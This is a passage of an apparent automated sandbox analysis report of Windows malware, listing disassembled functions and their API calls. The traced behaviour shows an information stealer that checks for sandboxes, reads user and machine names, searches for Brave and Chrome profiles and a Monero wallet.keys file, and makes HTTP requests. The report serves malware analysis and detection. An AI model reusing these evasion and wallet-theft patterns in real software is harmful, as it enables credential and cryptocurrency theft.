                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FE5E30), ref: 001399C5
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2398), ref: 001399DE
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 001211D0: ExitProcess.KERNEL32 ref: 00121211
                                • Part of subcall function 00121160: GetSystemInfo.KERNEL32(?), ref: 0012116A
                                • Part of subcall function 00121160: ExitProcess.KERNEL32 ref: 0012117E
                                • Part of subcall function 00121110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                                • Part of subcall function 00121110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                                • Part of subcall function 00121110: ExitProcess.KERNEL32 ref: 00121143
                                • Part of subcall function 00121220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                                • Part of subcall function 00121220: __aulldiv.LIBCMT ref: 00121258
                                • Part of subcall function 00121220: __aulldiv.LIBCMT ref: 00121266
                                • Part of subcall function 00121220: ExitProcess.KERNEL32 ref: 00121294
                                • Part of subcall function 00136770: GetUserDefaultLangID.KERNEL32 ref: 00136774
                                • Part of subcall function 00121190: ExitProcess.KERNEL32 ref: 001211C6
                                • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                                • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                                • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                                • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                                • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                                • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                              • Sleep.KERNEL32(00001770), ref: 00136B04
                              • CloseHandle.KERNEL32(?,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                              • ExitProcess.KERNEL32 ref: 00136B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                              • Instruction ID: 3383cd6d65cac6920b2869dbf17842652e12575b2241996106d8b56cf6132163
                              • Opcode Fuzzy Hash: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                              • Instruction Fuzzy Hash: FB312C71940208BBDB05FBF0DC56BEE7778AF24700F908518F252B6192DFB06A05CBA2

                              Control-flow Graph

                              • Graph rendering omitted: function 00121220 (blocks 121220-12129d) calls GlobalMemoryStatusEx, with one branch leading to ExitProcess
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                              • __aulldiv.LIBCMT ref: 00121258
                              • __aulldiv.LIBCMT ref: 00121266
                              • ExitProcess.KERNEL32 ref: 00121294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                              • Instruction ID: 31fa46fd4e5fc402f28a198e4cfa08a08030b633e4d02772dfe612f2155657de
                              • Opcode Fuzzy Hash: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                              • Instruction Fuzzy Hash: 97011DB0D44318FAEB10DBE4ED49BAEBB78AB24705F308048F705B62C0D7B455558B99

                              Control-flow Graph

                              • Graph rendering omitted: function spanning blocks 136aba-136b22 calls OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                              • Sleep.KERNEL32(00001770), ref: 00136B04
                              • CloseHandle.KERNEL32(?,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                              • ExitProcess.KERNEL32 ref: 00136B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                              • Instruction ID: a5596bbc9c0339a73978337f60cf2fa5bb22aa0307e1a7ee3d63dda9ebe7cdef
                              • Opcode Fuzzy Hash: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                              • Instruction Fuzzy Hash: 7DF0D470A40219BBE711ABA0DC1ABBEBA78EB14701F10C914F513A61D5DBF05540EAA6

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: bbe18a6b64efae1d877b92fdfea9ab3acf6475fe30f1a1c5a65a1ca630c1ae2d
                              • Instruction ID: 253fedf34cb0c7430c9f17febb560e5ab47a4fd8cf8be5d29565fa0b09221bb7
                              • Opcode Fuzzy Hash: bbe18a6b64efae1d877b92fdfea9ab3acf6475fe30f1a1c5a65a1ca630c1ae2d
                              • Instruction Fuzzy Hash: 8E214DB1D00209ABDF14DFA4E845ADE7B78FF44320F108625F969A72C1EB706A05CF92

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                                • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126303
                                • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                                • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385
                                • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                                • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                              • Instruction ID: 8d83b94216ccbabed5cbd3ed538a7aeae1920419d82aacaae602f5dc2eb57580
                              • Opcode Fuzzy Hash: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                              • Instruction Fuzzy Hash: 08111231910148BBDB14FF74ED92AED7739AF60300FC04158F85A5B592EF31AB15CA91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                              • Instruction ID: 9140dcc8c5739ed301473ee0128126c76a4c78db7c1f98bf069fc178ed9db50e
                              • Opcode Fuzzy Hash: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                              • Instruction Fuzzy Hash: 010181B1A04608EBD714DF99DD45BAABBBCFB04B35F10421AFA45F7280C37459008BA2
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                              • ExitProcess.KERNEL32 ref: 00121143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                              • Instruction ID: e50794417332e81ba0d084ca16cab0facfd6ded9e8d8c312877d42d6fd822d0c
                              • Opcode Fuzzy Hash: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                              • Instruction Fuzzy Hash: 3DE0E671985308FBE711ABA0AC0AB097A7CEB14B01F104154F709771D0D7F526509A99
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001210B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001210F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                              • Instruction ID: 48eba0d768a20eb4d7568c3f18bd81710ebbe4bcd59b063549cf6146834fe06c
                              • Opcode Fuzzy Hash: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                              • Instruction Fuzzy Hash: 86F0E271641318BBE714DBA4AC49FAAB7ECE705B15F305448F504E3280D672AE00CBA4
                              APIs
                                • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                                • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                                • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                                • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                                • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                                • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                              • ExitProcess.KERNEL32 ref: 001211C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 9bdf2a04e1185e7501135741a9c6a23ea3c7b811ac0664166280a452f11c9da7
                              • Instruction ID: 30238aba1440ac1905e5c6760280a6b4710a8a82ed5d3156743dc4c165844f70
                              • Opcode Fuzzy Hash: 9bdf2a04e1185e7501135741a9c6a23ea3c7b811ac0664166280a452f11c9da7
                              • Instruction Fuzzy Hash: 13E012B591430963CA10B3B5BC0AB2A369C5B34345F044825FA49E3152FBA5F8208A66
                              APIs
                              • wsprintfA.USER32 ref: 001338CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001338E3
                              • lstrcat.KERNEL32(?,?), ref: 00133935
                              • StrCmpCA.SHLWAPI(?,00140F70), ref: 00133947
                              • StrCmpCA.SHLWAPI(?,00140F74), ref: 0013395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00133C67
                              • FindClose.KERNEL32(000000FF), ref: 00133C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 677925c16722eb82d85a4ccd45eef9cc3d9b765909d32ab58175c9bf4331eabc
                              • Instruction ID: 3d6e61189d7fc2ba31a0cc8d86a0e578b8d143a86c23e63bafc2a329abdbc331
                              • Opcode Fuzzy Hash: 677925c16722eb82d85a4ccd45eef9cc3d9b765909d32ab58175c9bf4331eabc
                              • Instruction Fuzzy Hash: 00A13FB1A00218ABDB25DFA4DC85FEA737DBF58300F048598E61DA6141EB759B84CF62
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00140B32,00140B2B,00000000,?,?,?,001413F4,00140B2A), ref: 0012BEF5
                              • StrCmpCA.SHLWAPI(?,001413F8), ref: 0012BF4D
                              • StrCmpCA.SHLWAPI(?,001413FC), ref: 0012BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0012C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 7db0857ceb1c53666d7675ed3186614f1683e23fd6b07bb965de1ef9f5f4fc5a
                              • Instruction ID: 928744e46e6e00fdcf3b4c9f480dbcd7202f247b82a19801fe494e8d7ad0899c
                              • Opcode Fuzzy Hash: 7db0857ceb1c53666d7675ed3186614f1683e23fd6b07bb965de1ef9f5f4fc5a
                              • Instruction Fuzzy Hash: E8427772900104ABDB14FBB0DD96EED737DAF64300F808598F946A7191EF34AB49CB92
                              APIs
                              • wsprintfA.USER32 ref: 0013492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00134943
                              • StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                              • StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                              • FindClose.KERNEL32(000000FF), ref: 00134B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 8e1891053150488f9f59d2b6b151f77e9d6496c88811c03d688b1f5f922e3716
                              • Instruction ID: 6a1acb3193fe363f59e667c22384f1073bab745da45a41f32e2b8a2a2acef5c6
                              • Opcode Fuzzy Hash: 8e1891053150488f9f59d2b6b151f77e9d6496c88811c03d688b1f5f922e3716
                              • Instruction Fuzzy Hash: 386188B1900618ABCB25EBA0DC49FEA737CBF58701F048598F609A6041EB75EB85CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                              • wsprintfA.USER32 ref: 001345A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                              • StrCmpCA.SHLWAPI(?,00140FC4), ref: 001345EB
                              • StrCmpCA.SHLWAPI(?,00140FC8), ref: 00134601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0013468B
                              • FindClose.KERNEL32(000000FF), ref: 001346A0
                              • lstrcat.KERNEL32(?,00FFE868), ref: 001346C5
                              • lstrcat.KERNEL32(?,00FFD880), ref: 001346D8
                              • lstrlen.KERNEL32(?), ref: 001346E5
                              • lstrlen.KERNEL32(?), ref: 001346F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 095256b7e19e3a4bfad6a3df4b272ae402761152ee7e987a224eb7b56ccbe972
                              • Instruction ID: 54bff528d3786076b9e6c93a2a4b44f8329e94ccd5e1a1f040b601dfaf7d9ed5
                              • Opcode Fuzzy Hash: 095256b7e19e3a4bfad6a3df4b272ae402761152ee7e987a224eb7b56ccbe972
                              • Instruction Fuzzy Hash: 255168B1940218ABC725EBB0DC89FED777CAF58700F408598F649A6150EBB5EB84CF91
                              APIs
                              • wsprintfA.USER32 ref: 00133EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00133EDA
                              • StrCmpCA.SHLWAPI(?,00140FAC), ref: 00133F08
                              • StrCmpCA.SHLWAPI(?,00140FB0), ref: 00133F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0013406C
                              • FindClose.KERNEL32(000000FF), ref: 00134081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 0cc61c1fa4f8dc490fdaf50a1dc73257f5e0c92d7da3c414bd3a2241841ac165
                              • Instruction ID: 9a656457444c6cf59f0a24a8edba30dfeee65ca1849274c0e6971a50f52af09d
                              • Opcode Fuzzy Hash: 0cc61c1fa4f8dc490fdaf50a1dc73257f5e0c92d7da3c414bd3a2241841ac165
                              • Instruction Fuzzy Hash: 3E5158B1900618ABCB25EBB0DC85EEE777CBF58300F408598F659A6040DB75EB898F95
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .XE$5zW$D,Gl$Eu{$M7N|$OEqQ$r7{I$ry/$r_{$v_{${#?$A?n$Z_|
                              • API String ID: 0-4083549949
                              • Opcode ID: a4b2c570ac56619f621610e656859958b8755b09778df0504e8f589b6bdb6a0f
                              • Instruction ID: f042dfa19cd50f90d73b68100e8f94fa5d15259f0f6afdd2ed7779561e1d2f05
                              • Opcode Fuzzy Hash: a4b2c570ac56619f621610e656859958b8755b09778df0504e8f589b6bdb6a0f
                              • Instruction Fuzzy Hash: 02B25AF360C2009FE7046E2DEC8567AFBE9EF94720F1A493DEAC5C7744E63598018696
                              APIs
                              • wsprintfA.USER32 ref: 0012ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0012ED55
                              • StrCmpCA.SHLWAPI(?,00141538), ref: 0012EDAB
                              • StrCmpCA.SHLWAPI(?,0014153C), ref: 0012EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0012F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 4e991fb9d7cb8ecb84ecda396d685f8c2a8bdfb6343e2061de4ee05e619bf728
                              • Instruction ID: 0c755d3cdbcd01474f96067fbf73e68398c3b864aa3d26edc6b57a991c505b2f
                              • Opcode Fuzzy Hash: 4e991fb9d7cb8ecb84ecda396d685f8c2a8bdfb6343e2061de4ee05e619bf728
                              • Instruction Fuzzy Hash: FCE1F972911118AAEB55FB60DC92EEE737CAF64301FC041E9B54A62052EF306F8ACF51
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001415B8,00140D96), ref: 0012F71E
                              • StrCmpCA.SHLWAPI(?,001415BC), ref: 0012F76F
                              • StrCmpCA.SHLWAPI(?,001415C0), ref: 0012F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0012FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
